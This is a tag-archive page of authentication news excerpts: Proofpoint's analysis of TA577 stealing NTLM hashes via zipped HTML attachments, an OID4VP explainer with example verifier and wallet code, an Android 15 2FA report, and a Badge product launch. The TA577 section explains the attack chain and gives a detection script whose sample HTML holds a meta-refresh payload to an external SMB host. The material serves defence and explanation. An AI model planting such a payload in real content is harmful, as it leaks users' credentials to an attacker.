Tag Archive for: Authentication

TA577 Exploits NTLM Authentication Vulnerability


Cybersecurity researchers at Proofpoint have uncovered a new tactic employed by cybercriminal threat actor TA577, shedding light on a lesser-seen objective in their operations. 

The group was found utilizing an attack chain aimed at stealing NT LAN Manager (NTLM) authentication information. This method could potentially be exploited for sensitive data gathering and facilitating further malicious activities.

In an analysis published earlier today, the Proofpoint team identified at least two campaigns conducted by TA577 on February 26 and 27, 2024, employing this technique.

These campaigns targeted hundreds of organizations globally, sending out tens of thousands of messages. The messages were designed to appear as replies to previous emails, a tactic known as thread hijacking, and contained zipped HTML attachments.

Each attachment had a unique file hash, and the HTML files within were tailored to specific recipients. When opened, each file used a meta refresh to send the browser to a file-scheme URI ending in .txt that named a Server Message Block (SMB) server controlled by the threat actor. Windows resolves a file:// URI with a remote host as a UNC path, so the victim machine attempts an SMB connection and automatically answers the server’s NTLM challenge with the logged-on user’s credentials, which is what lets the attacker capture the hashes.

Proofpoint’s analysis did not observe any malware being delivered from these URLs. Instead, based on the characteristics of the attack chain and the tooling used, researchers concluded that TA577’s objective was to capture NTLMv2 challenge/response pairs (commonly referred to as NTLM hashes) from the victim hosts.

Captured challenge/response pairs can be cracked offline to recover the account password, and Proofpoint notes they could also facilitate “Pass-the-Hash” attacks within targeted organizations. Note that a Net-NTLMv2 response is not the NT hash itself, so it cannot be passed directly: Pass-the-Hash needs the NT hash that cracking yields, while the captured response can only be relayed in real time to another service that does not enforce signing. Indicators suggest the attacker’s SMB servers ran the open-source toolkit Impacket, which is uncommon in legitimate SMB deployments.


It’s worth noting that the delivery method used by TA577 – a malicious HTML file inside a zip archive – is designed to slip past email security controls. Even disabling guest access to SMB does not mitigate the attack, because the victim host authenticates outbound to the attacker’s SMB server with its own credentials rather than as a guest. Blocking outbound SMB (TCP 445) to the internet at the network edge is the control that actually stops the hash from leaving.
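The attachment pattern described above can be checked for mechanically. The following is an added example written for this page, not Proofpoint’s detection logic: it parses an HTML file for meta-refresh, href, src, action and data targets that use a file:// URI or a UNC path (two leading backslashes then a host), extracts the remote host, and flags it when the host falls outside an assumed internal allow-list. The sample HTML, the internal DNS suffix and the allow-listed networks are constructed for the example.

```python
"""Scan an HTML attachment for redirects to external SMB/UNC targets.

Added example for this page; not Proofpoint's tooling. SAMPLE_HTML,
INTERNAL_SUFFIXES and the internal network list are constructed.
"""
import ipaddress
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample: an external meta refresh (the TA577 pattern) plus an internal UNC image.
SAMPLE_HTML = r"""<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/share/recipient.txt">
</head><body><img src="\\fileserver.corp.example\branding\logo.png">Loading...</body></html>"""

INTERNAL_SUFFIXES = (".corp.example",)  # assumed internal DNS suffixes
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
_UNC_RE = re.compile(r"^\\\\([^\\/]+)")          # two backslashes, then the host
_REFRESH_RE = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.IGNORECASE)


def unc_or_file_host(target: str) -> Optional[str]:
    """Remote host named by a file:// URI or a UNC path; None for anything else."""
    target = target.strip()
    m = _UNC_RE.match(target)
    if m:
        return m.group(1)
    parts = urlsplit(target)
    if parts.scheme.lower() == "file" and parts.hostname:  # file:///C:/... has no host
        return parts.hostname
    return None


def is_external(host: str) -> bool:
    """True when the host is neither a private/loopback address nor an internal name."""
    host = host.lower().rstrip(".")
    if host == "localhost" or host.endswith(INTERNAL_SUFFIXES):
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host  # single-label names resolve internally; other FQDNs are external
    return not (ip.is_loopback or ip.is_link_local or any(ip in net for net in _INTERNAL_NETS))


class _TargetCollector(HTMLParser):
    """Collect every attribute value that could trigger a fetch."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs if v is not None}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = _REFRESH_RE.search(a.get("content", ""))
            if m:
                self.targets.append(("meta-refresh", m.group(1)))
        for attr in ("href", "src", "action", "data"):
            if attr in a:
                self.targets.append((f"{tag}[{attr}]", a[attr]))


def scan_html(html: str) -> list:
    """Return one finding per file://-or-UNC target, with an 'external' verdict."""
    parser = _TargetCollector()
    parser.feed(html)
    findings = []
    for where, target in parser.targets:
        host = unc_or_file_host(target)
        if host is not None:
            findings.append({"where": where, "target": target,
                             "host": host, "external": is_external(host)})
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(("ALERT " if f["external"] else "ok    ") + f"{f['where']} -> {f['host']}")
```

Any hit on an external host from a mail attachment is worth alerting on regardless of whether the path ends in .txt, since the SMB connection (and the NTLM exchange) happens before the named file is ever read.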

“Proofpoint researchers have also seen an increase…

Source…

The Evolution of Authentication with OIDC4VP and FIDO2


When was the last time you struggled to remember a password? The answer is perhaps one too many times. In today’s digital age, our data consumption is skyrocketing, bringing with it increased risks. Traditional password-based authentication systems are falling short against sophisticated cyber threats. That’s why the move to passwordless authentication options like OID4VP and FIDO2 is critical for both businesses and users.

Let’s dive into understanding how these new authentication solutions tackle the vulnerabilities of traditional password systems and provide a comparison between them.

Passwordless Authentication: A Paradigm Shift with OID4VP and FIDO2

The inconvenience and risks associated with passwords, including phishing attacks and stolen credentials, are well-known. Hence, passwordless authentication emerges as a relief for consumers, who now do not have to bother with remembering and storing hundreds of account credentials. This approach enables users to verify their identity seamlessly and securely through biometric factors or one-time codes, eliminating the reliance on traditional passwords. One important protocol in this domain is OpenID for Verifiable Presentations (OID4VP), which offers a standardised method for secure verification, thereby reducing the risks.


OpenID for Verifiable Presentations (OID4VP) is defined on top of OAuth 2.0 and is designed to be used alongside OpenID Connect. It adds a vp_token response type so that a wallet can present claims carried in Verifiable Credentials to a verifier as part of the protocol flow, with the presentation bound to the verifier’s request.

With OID4VP, users present digital proofs of identity, attributes or qualifications to verifiers from a wallet. The proofs take the form of Verifiable Presentations (VPs): one or more Verifiable Credentials, as defined in the W3C data model, packaged together with a holder proof that ties them to the verifier’s nonce, and carried over well-known web standards for authentication and authorisation such as OAuth 2.0 and OpenID Connect.
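To make the exchange concrete, here is an added example of the verifier and wallet sides of an OID4VP request and response. It is illustrative code written for this page, not code from the article or from any OID4VP library. It assumes the request reaches the wallet as a URL, that the VP is a plain JSON object whose signature has already been checked before verify_response is called (proof verification is out of scope), and that JSONPath is limited to the “$.a.b[0]” subset used in descriptor maps. The presentation definition and the credential are constructed.

```python
"""Verifier and wallet sides of an OID4VP exchange (added example, not library code)."""
import json
import re
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

_TOKEN = re.compile(r"\.([A-Za-z_][\w-]*)|\[(\d+)\]")


def resolve_path(obj, path):
    """Resolve the '$.a.b[0].c' JSONPath subset; KeyError if the value is absent."""
    if not path.startswith("$"):
        raise ValueError(f"unsupported path {path!r}")
    pos = 1
    for m in _TOKEN.finditer(path, 1):
        if m.start() != pos:
            raise ValueError(f"unsupported path {path!r}")
        pos = m.end()
        key, idx = m.groups()
        try:
            obj = obj[key] if key is not None else obj[int(idx)]
        except (KeyError, IndexError, TypeError):
            raise KeyError(path) from None
    if pos != len(path):
        raise ValueError(f"unsupported path {path!r}")
    return obj


def _present(obj, path):
    try:
        resolve_path(obj, path)
        return True
    except KeyError:
        return False


class Verifier:
    """Relying party: issues requests with fresh nonces and checks presentations."""

    def __init__(self, client_id):
        self.client_id = client_id
        self._pending = {}  # nonce -> presentation_definition, consumed on use

    def create_request(self, presentation_definition):
        nonce = secrets.token_urlsafe(16)
        self._pending[nonce] = presentation_definition
        params = {"response_type": "vp_token", "client_id": self.client_id,
                  "nonce": nonce, "presentation_definition": json.dumps(presentation_definition)}
        return "openid4vp://?" + urlencode(params)

    def verify_response(self, form):
        vp = json.loads(form["vp_token"])
        submission = json.loads(form["presentation_submission"])
        pd = self._pending.pop(vp.get("nonce"), None)  # one-shot nonce: a replay fails here
        if pd is None:
            raise ValueError("unknown or reused nonce")
        if submission.get("definition_id") != pd["id"]:
            raise ValueError("presentation_submission does not answer this request")
        by_id = {d["id"]: d for d in submission["descriptor_map"]}
        matched = {}
        for desc in pd["input_descriptors"]:  # every requested descriptor must be satisfied
            entry = by_id.get(desc["id"])
            if entry is None:
                raise ValueError(f"no credential submitted for {desc['id']}")
            cred = resolve_path(vp, entry["path"])
            for field in desc["constraints"]["fields"]:
                if not any(_present(cred, p) for p in field["path"]):
                    raise ValueError(f"{desc['id']}: required claim {field['path']} missing")
            matched[desc["id"]] = cred
        return matched


def wallet_respond(request_url, credential):
    """Wallet: parse the request, echo its nonce into the VP, map the credential."""
    q = parse_qs(urlsplit(request_url).query)
    pd = json.loads(q["presentation_definition"][0])
    vp = {"type": ["VerifiablePresentation"], "verifiableCredential": [credential],
          "nonce": q["nonce"][0]}  # binds this presentation to this request
    submission = {"id": secrets.token_hex(8), "definition_id": pd["id"],
                  "descriptor_map": [{"id": d["id"], "format": "ldp_vc",
                                      "path": "$.verifiableCredential[0]"}
                                     for d in pd["input_descriptors"]]}
    return {"vp_token": json.dumps(vp), "presentation_submission": json.dumps(submission)}


# Constructed data: the verifier asks for a degree type; the wallet holds one such credential.
DEGREE_PD = {"id": "degree-check", "input_descriptors": [
    {"id": "degree", "constraints": {"fields": [{"path": ["$.credentialSubject.degree.type"]}]}}]}
SAMPLE_VC = {"type": ["VerifiableCredential", "UniversityDegreeCredential"],
             "issuer": "https://university.example",
             "credentialSubject": {"id": "did:example:holder", "degree": {"type": "BachelorDegree"}}}


def demo():
    """Run a good exchange, a replay of it, and a presentation lacking the claim."""
    v = Verifier("https://verifier.example/cb")
    form = wallet_respond(v.create_request(DEGREE_PD), SAMPLE_VC)
    degree_type = v.verify_response(form)["degree"]["credentialSubject"]["degree"]["type"]
    results = {"degree_type": degree_type, "replay_rejected": False, "missing_claim_rejected": False}
    try:
        v.verify_response(form)
    except ValueError:
        results["replay_rejected"] = True
    bad = wallet_respond(v.create_request(DEGREE_PD), {"credentialSubject": {"id": "did:example:x"}})
    try:
        v.verify_response(bad)
    except ValueError:
        results["missing_claim_rejected"] = True
    return results
```

The two checks that matter most are the ones that do not depend on the credential’s signature: the nonce must be one the verifier issued and not yet consumed, and every input descriptor must be answered by a credential that actually carries the requested claim. A VP whose signature is valid but whose nonce belongs to an earlier request is a replay, not a fresh presentation.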

Apart from OID4VP, FIDO2 (Fast Identity Online) also presents developers with an alternative for securing users’ digital interactions.

FIDO2 is a collaborative initiative by the FIDO Alliance and the World Wide Web Consortium (W3C) aimed at…

Source…

Android 15 Could Offer a Boost to Two-Factor Authentication Security to Keep User Data Safe: Report


Android 15 is still under development, but on Friday, February 16, Google released the first Developer Preview of the upcoming operating system. The tech giant said that the new Android software will largely focus on security, and a new report claims to have found three new ways it will make your smartphone and your sensitive data more secure. According to it, Android 15 will better protect the notifications generated by two-factor authentication (2FA) so that a malicious app or malware cannot read them to steal user data.

According to a report by Android Authority’s Mishaal Rahman, Android 15 will implement new ways to cover the gaps left by its predecessors. Currently, most two-factor authentication methods for social media profiles, email and banking apps send a one-time password (OTP) by SMS. The risk is that a malicious third-party app with notification access can read the OTP from that notification and use it to take over the account or authorize a banking transaction.

To reduce the risk, Google has already begun laying the groundwork in the current edition of the OS. The report found a line of code in the Android 14 QPR3 Beta 1 update that mentions a new permission named RECEIVE_SENSITIVE_NOTIFICATIONS. This permission has a higher protection level and can only be granted to apps that Google itself verifies. Its exact role is not known, but given its name it appears to cover a special category of notifications that third-party apps will not be able to read.

The report suggests it is likely aimed at 2FA-related notifications. That belief comes from a separate string found by Rahman, which points to an under-development platform feature the permission is tied to. The feature governs NotificationListenerService, the long-standing API that lets apps read or act on notifications; a common use is an app asking for notification access so that it can auto-fill an OTP when a user creates a new account. Once the feature is active (it isn’t in the Android 14 build), reading such notifications through that API will become harder for apps that lack the new permission.

This API will require the user to enter Settings and then manually grant permission to apps…

Source…

No secrets or stored credentials with Badge’s new authentication system


Badge Inc., a digital privacy firm founded by MIT cryptographers, is celebrating the launch of its patented authentication software, which allows users to enroll once and authenticate across devices thereafter without re-registration. According to a press release, the biometric public key system is easily integrated with leading digital identity providers, and eliminates the risk of centrally stored personal identity information and biometric data being exposed to breaches, thus rendering passwords, knowledge-based authentication (KBA) and biometric credential storage obsolete.

“The problem of storing credentials has vexed the security community for decades,” says Ray Rothrock, Badge advisor, venture capitalist and former CEO of Red Seal. According to Badge, by doing away with stored credentials the system eliminates the target of 49 percent of all data breaches. “The pervasive concern of PII being in the open and unprotected is over,” says Rothrock. “Badge enables identity without secrets.”

The product does so by letting users derive private keys on the fly using their biometrics and factors of choice, without having to rely on hardware tokens or secrets. It also dodges the problem of on-device authentication that locks users to a specific device that can be lost or rendered inoperable, leading to cumbersome account recovery processes. Per the release, users enroll once then “seamlessly authenticate across any device using authentication factors that are unique and inherent to them, including biometric factors such as fingerprint or face. These biometric factors can be combined with other factors such as passive attributes, attestation signals, PINs, etc.,” for an MFA method that does not rely on a specific device or token.

“You are your token”

Tina P. Srivastava, co-founder of Badge and an MIT aerospace PhD, says Badge’s core mission is to move the trust-anchor for digital identities to the human instead of hardware. “After losing my own identity in a breach,” says Srivastava, “we went back to the fundamentals. We relied on math to solve the problem and used cryptography to build a user-centric solution that makes people their own…

Source…